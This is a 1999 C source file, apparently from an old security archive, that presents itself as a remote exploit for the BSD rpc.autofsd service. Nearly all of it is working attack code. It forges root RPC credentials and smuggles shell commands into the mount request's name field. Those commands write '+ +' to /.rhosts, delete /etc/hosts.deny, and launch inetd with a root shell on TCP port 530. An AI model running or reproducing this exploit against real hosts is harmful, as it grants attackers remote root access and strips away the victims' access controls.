home *** CD-ROM | disk | FTP | other *** search
- // *** Synnergy Networks
-
- // * Description:
- //
- // Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
- // on tcp port 530.
-
- // * Author:
- //
- // guidob (guidob@synnergy.net)
- // Synnergy Networks (c) 1999, http://www.synnergy.net
-
- // * Greets:
- //
- // Synnergy Networks, LoU, Cindy
-
- // * Comments:
- //
- // This will not work on all types and/or versions.
-
- // *** Synnergy Networks
-
- #include <sys/types.h>
- #include <sys/time.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <stdio.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <stdlib.h>
- #include <errno.h>
- #include <string.h>
- #include <netdb.h>
- #include <rpc/rpc.h>
- #include <rpc/xdr.h>
- #include <signal.h>
-
- #define AUTOFS_PROG ((u_long)100099)
- #define AUTOFS_VERS ((u_long)1)
- #define AUTOFS_MOUNT ((u_long)1)
-
- #define AT 8
- #define A_MAXNAME 255
- #define A_MAXOPTS 255
- #define A_MAXPATH 1024
-
- struct mntrequest
- {
- char *name; /* name to be looked up */
- char *map; /* map to use [2000]*/
- char *opts; /* default options[2000]*/
- char *path; /* mountpoint to use */
- };
-
- struct mntres
- {
- int status; /* 0=OK, otherwise an errno from <sys/errno.h> */
- };
-
- bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp)
- {
- if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
- if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
- if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
- if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
- return (TRUE);
- }
- void signal_handler(void)
- {
- exit(0);
- }
- bool_t xdr_mntres(XDR *xdrs,struct mntres *objp)
- {
- if (!xdr_int(xdrs, &objp->status)) return (FALSE);
- return (TRUE);
- }
-
- main(int argc, char **argv)
- {
-
- CLIENT *cl;
- struct mntrequest mntreq;
- struct mntres *res;
- struct sockaddr_in target;
- struct hostent *hp;
- struct timeval tm;
- char *host;
- enum clnt_stat stat;
-
-
- int sd;
-
- signal(SIGALRM, signal_handler);
-
- alarm(AT);
- host=argv[1];
-
- if ((target.sin_addr.s_addr = inet_addr(host)) == -1)
- {
- if ((hp = gethostbyname(host)) == NULL)
- {
- printf("%s: cannot resolve\n", host);
- exit(1);
- }
- else
- target.sin_addr.s_addr = *(u_long *)hp->h_addr;
- }
- target.sin_family=AF_INET;
- target.sin_port=0;
-
- sd=RPC_ANYSOCK;
- tm.tv_sec=8;
-
- tm.tv_usec=0;
- if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL)
- {
- clnt_pcreateerror("clnt_create");
- exit(0);
- }
- cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
- tm.tv_sec = 25;
-
- /* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
- */
- mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* Tu mozna wstawic co sie chce */
- mntreq.map="/bin/true";
- mntreq.path="/hosts";
- mntreq.opts="";
- bzero((char *)&res, sizeof(res));
-
- if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
- (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS)
- {
- clnt_perror(cl, "clnt_call");
- exit(1);
- }
-
- clnt_destroy(cl);
- }
-
- // EOF
-